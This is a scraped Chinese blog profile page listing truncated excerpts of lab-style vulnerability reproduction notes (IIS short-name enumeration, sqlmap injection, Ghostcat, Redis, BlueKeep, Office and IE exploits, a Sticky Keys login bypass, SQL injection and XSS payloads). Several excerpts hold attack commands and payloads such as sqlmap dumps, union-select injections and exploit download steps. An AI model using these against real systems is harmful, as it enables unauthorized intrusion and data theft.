自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(23)
  • 收藏
  • 关注

原创 谷歌浏览器导入密码

在地址栏中输入chrome://flags启动该功能重启浏览器

2020-10-21 10:49:53 1897

原创 Linux常用基础命令

命令终端放大缩小:放大CTRL+shift+=缩小CTRL±列出内容命令 ls//列出隐藏文件 ‘.’表示当前目录 ‘…’表示上一级目录ls -a//以列表方式显示文件的详细信息ls -l//人性方式显示文件的大小ls -lh通配符:‘*’ 可以代表任意个数的字符‘?’ 可代表一个任意字符[] 可匹配字符组中的任意一个字符更改当前工作目录 cdcd 切换到主目录cd ~切换到主目录cd . 不变cd … 上级目录cd -最近两次目录间来回切换相对路径:在输入路

2020-06-12 23:36:10 168

原创 Microsoft IIS波浪号目录枚举/IIS短文件名枚举漏洞

Microsoft IIS在实现上存在文件枚举漏洞,攻击者可利用此漏洞枚举网络服务器根目录中的文件。复现:/images//*~1*/a.aspx?aspxerrorpath=/危害: 攻击者可以利用“~”字符猜解或遍历服务器中的文件名,或对IIS服务器中的.Net Framework进行拒绝服务攻击。解决方案:修改注册列表HKLM\SYSTEM\CurrentControlSet\Control\FileSystem \NtfsDisable8dot3NameCreation的值为1,或者,

2020-06-11 00:26:36 8123 1

原创 sqlmap数据包注入

burpsuite抓包在sqlmap根目录建一个文档,将数据包复制到文档中,将注入点值改为*例X-Forwarded-For注入: X-Forwarded-For: *爆破数据库python2 sqlmap.py -r a.txt --dbs --batch爆破表名python2 sqlmap.py -r a.txt -D "数据库名" --table --batch爆表中的字段python2 sqlmap.py -r a.txt -D "数据库名" -T "表名" --column

2020-06-08 23:41:18 2374

原创 win证书漏洞CVE-2020-0601

影响版本:Windows 10Windows Server 2016/2019依赖于Windows CryptoAPI的应用程序复现:查看一下本地windows证书,win+r输入certmgr.msc这里可以看到系统默认的ECC签名根证书,随便找一个导出:双击证书可以看到证书的详细信息:安装rubya@a-virtual-machine:~$ sudo apt install ruby//若提示进程被占用解决方法//ps -A | grep apt 列出使用的进程//

2020-05-23 22:10:35 852

原创 win关闭某端口

//查看本机开放端口,TIME_WAIT代表进程正在改变,LISTENING需要手动关闭C:\Users\17273>netstat -an活动连接 协议 本地地址 外部地址 状态 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING TCP 0.0.0.0:443 0.0.0.0:0 LISTENING TCP

2020-05-20 15:42:02 151

原创 Nginx读取缓存-CVE-2017-7529

影响范围:Nginx 0.5.6 - 1.13.2复现://下载pocC:\Users\17273\Downloads\wordpress46-learn-master>git clone https://github.com/en0f/CVE-2017-7529_PoCCloning into 'CVE-2017-7529_PoC'...remote: Enumerating objects: 6, done.remote: Total 6 (delta 0), reused 0 (

2020-05-19 15:42:10 256

原创 win 漏洞CVE-2020-0796

受漏洞影响版本:Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows 10 Version

2020-05-15 10:12:30 216

原创 幽灵猫漏洞复现

漏洞编号:CVE-2020-1938CNVD-2020-10487影响版本:Apache Tomcat = 67 <= Apache Tomcat < 7.0.1008 <= Apache Tomcat < 8.5.519 <= Apache Tomcat < 9.0.31解决措施:配置ajp配置中的secretRequired跟secret属性来限制认证 ;临时禁用AJP协议端口,在conf/server.xml配置文件中注释掉<Connec

2020-05-14 16:52:37 714

原创 6379 Redis 未授权访问

漏洞产生原因网络管理员安装Redis,没有修改默认端口,没有设置密码。环境搭建//下载压缩包wget http://download.redis.io/releases/redis-3.2.11.tar.gz//解压tar xzf redis-3.2.11.tar.gz//进入解压目录cd redis-3.2.11make//进入src目录cd src//拷贝redis-server到/usr/bincp redis-serrver /usr/bin//拷贝redis-cli到

2020-05-14 15:30:12 601

原创 win MS08-067漏洞复现

影响范围:Windows 2000Windows XPWindows Server 2003复现环境win xp :192.168.31.178kali :192.168.31.117

2020-05-12 18:29:44 557

原创 win未登录连按shift以管理员身份开启cmd漏洞

复现可用于自己电脑忘记密码使用强制关闭win7虚拟机后启动,点击启动启动修复:自动修复一段时间会弹出如下界面,点击取消让他继续修复:经过长时间修复后会出现无法修复的窗口,此时点击问题纤细信息:上面的问题签名不用管,直接拉到最下面会看到一个隐私声明,点击他:这时会出现一个txt文档,点击 文件->打开 :这时点击计算机进入系统盘打开windows ->system32文件夹,寻找连按五次触发的sethc文件:将他重命名,任意起一个名字,这里的目的是为了下次不会再触发他:

2020-05-11 14:18:38 591 1

原创 cve-2020-11652漏洞复现

介绍:Saltstack是基于python开发的一套C/S架构自动化运维工具,通过Saltstack运维人员可以实现在众多服务器上批量执行命令,提高运维效率,因而受到一些云主机商、私有云公司的青睐。然而,近日SaltStack被爆存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。其中,通过认证绕过漏洞,攻击者可构造恶意请求,绕过Salt Master...

2020-05-08 17:27:28 1489

原创 win CVE-2019-1388 UAC提权复现

影响系统Microsoft Windows Server 2019Microsoft Windows Server 2016Microsoft Windows Server 2012Microsoft Windows Server 2008 R2Microsoft Windows Server 2008Microsoft Windows RT 8.1Microsoft Windows...

2020-04-29 14:48:15 375

原创 winCVE-2017-8464漏洞复现

影响版本windows 10windwos RT 8.1windows 8.1windows 7windows server 2016windows server 2012 R2windows server 2012windows server 2008 R2windows server 2008复现需下载工具https://github.com/rapid7/metaspl...

2020-04-27 15:34:15 237

原创 ubuntu CVE-2017-16995 本地提权复现及修复

影响版本Linux内核:Linux Kernel Version 4.14 ~ 4.4Ubuntu版本:16.04.01~ 16.04.04查看权限及版本信息idcat /proc/version下载pocwget http://cyseclabs.com/pub/upstream44.c使用gcc进行编译,执行修复echo 1 > /proc/sys/kerne...

2020-04-26 11:32:10 385

原创 IE浏览器 CVE-2018-8174漏洞复现

漏洞介绍CVE2018-8174这个漏洞是针对ie浏览器的一个远程代码执行漏洞复现环境kaliwin7复现克隆文件git clone https://github.com/Sch01ar/CVE-2018-8174_EXP生成python CVE-2018-8174.py -u http://192.168.31.117/exploit.html -o exploit.rtf...

2020-04-23 17:08:38 401

原创 off CVE-2017-11882漏洞复现

CVE-2017-11882漏洞影响版本office 2003office 2007office 2010office 2013office 2016复现环境win7kalioffice 2016office2016分享链接:https://pan.baidu.com/s/15YrwY7_1OOFSgpsleS2O5A提取码:d1lo下载组件下载https://gith...

2020-04-22 11:31:14 327

原创 漏洞复现 CVE-2018-4878 Flash

受影响版本漏洞复现环境Kali LinuxWindows 7 sp1cve-2018-4878.pyflashplayer_activex_28.0.0.137.exe工具自行下载链接:https://pan.baidu.com/s/1Q-ryRThsdhsvOIc_Q5E9Bw提取码:owad环境配置将flashplayer_activex_28.0.0.137.exe安装...

2020-04-21 11:20:34 218

原创 win(CVE-2019-0708)漏洞复现

影响版本该漏洞影响旧版本的Windows系统,包括:Windows 7、Windows Server 2008 R2、Windows Server 2008、Windows 2003、Windows XP。下载套件wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61...

2020-04-20 17:27:04 437

原创 sql注入靶场1-65

第一关:单引号闭合:order by 判断字段数,显示位2.3:输出数据库版本?id=-1' union select 1,2,version() --+输出数据库名称:?id=-1' union select 1,2,database() --+查看所有表名:?id=-1' union select 1,2,group_concat(table_name) from informatio...

2020-03-26 17:48:19 588

原创 xss靶场笔记

1.构造xss直接过 :2."><script>alert(1)</script>发现对 html 特殊符号进行了实体编码,

2020-03-10 11:33:51 398

原创 文件上传漏洞靶场练习笔记

1.关闭js即可上传:注:本关完成后将js打开否则可能接下来无法查看提示;2.修改抓包修改type:3.抓包文件名后加数字:注:若不成功原因,phpstyudy不解析找到httpd文件 添加phtml php5 等:4.上传一个.htaccess文件<FilesMatch "这里填图片码文件名">SetHandler application/x-httpd-php</Fi...

2020-03-10 10:50:33 192

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除